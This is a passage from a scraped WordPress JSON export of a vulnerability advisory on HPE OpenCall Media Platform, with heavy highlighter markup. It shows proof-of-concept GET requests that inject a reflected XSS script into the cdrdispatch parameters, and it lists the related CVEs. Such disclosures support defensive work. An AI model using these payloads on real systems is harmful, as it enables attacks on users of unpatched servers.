data-line=\"crayon-58fe79da8367d423635730-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8367d423635730-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8367d423635730-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8367d423635730-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8367d423635730-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cdrdispatch<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">sessionType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ACTIVE<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ViewActiveCalls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">next<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">DisplayBaseCdrBrowsePagea908f<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">2f6bfa40b3d<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">CallSessionList<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ACTIVE <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8367d423635730-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8367d423635730-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8367d423635730-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8367d423635730-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8367d423635730-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8367d423635730-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8367d423635730-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&amp;sessionType=NONE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8367d423635730-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8367d423635730-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0034 seconds] -->  <\/p>\n<p><strong>Platform Administration Tool \u2013 <em>next<\/em> parameter<\/strong><\/p>\n<p>HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function parameter <em>sessionType<\/em> input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL:<br \/> <em>\/OCMPOAM\/cdrdispatch?<strong>sessionType<\/strong>=25ed6&#8243;&gt;&lt;script&gt;alert(1)&lt; %2fscript&gt;1b604fa73f3&amp;cmd=ViewActiveCalls&amp;next=DisplayBaseCdrBrowsePage&amp;CallSessionList=ACTIVE<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83686230533959\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/OCMPOAM\/cdrdispatch?sessionType=25ed6&#8243;&gt;&lt;script&gt;alert(1)&lt;%2fscript&gt;1b604fa73f3&amp;cmd=ViewActiveCalls&amp;next=DisplayBaseCdrBrowsePage&amp;CallSessionList=ACTIVE HTTP\/1.1  Host: 172.27.116.40:4443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Referer: https:\/\/172.27.116.40:4443\/OCMPOAM\/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&amp;sessionType=NONE  Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC  Connection: keep-alive<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83686230533959-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83686230533959-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83686230533959-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83686230533959-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83686230533959-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83686230533959-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83686230533959-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83686230533959-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83686230533959-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83686230533959-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83686230533959-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">OCMPOAM<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cdrdispatch<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">sessionType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">25ed6<\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1b604fa73f3<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ViewActiveCalls<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">next<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">DisplayBaseCdrBrowsePage<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">CallSessionList<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ACTIVE <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83686230533959-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.40<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">4443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83686230533959-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83686230533959-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83686230533959-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83686230533959-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83686230533959-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83686230533959-8\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.116.40:4443\/OCMPOAM\/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&amp;sessionType=NONE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83686230533959-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4F99C27525BFDB44D46E3A109FA49DAC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83686230533959-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">alive<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><strong>CVE&#8217;s<\/strong><\/p>\n<ul>\n<li>CVE-2017-5799 &#8211; Remote Code Execution<\/li>\n<li>CVE-2017-5798 &#8211; Reflected Cross-Site Scripting (XSS)<\/li>\n<\/ul><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3087\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/Application-Content-Manager-Parameter-300x169.png\"\/><\/p>\n<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 24 Apr 2017 05:57:39 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability that when combined can lead to arbitrary Javascript code execution, were found in HP OpenCall Media Platform (OCMP), version 4.3.2. HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications which allow implementation of common &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3087\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11640,12077,10757],"class_list":["post-7431","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-cross-site-scripting","tag-remote-file-inclusion","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7431","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7431"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7431\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7431"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}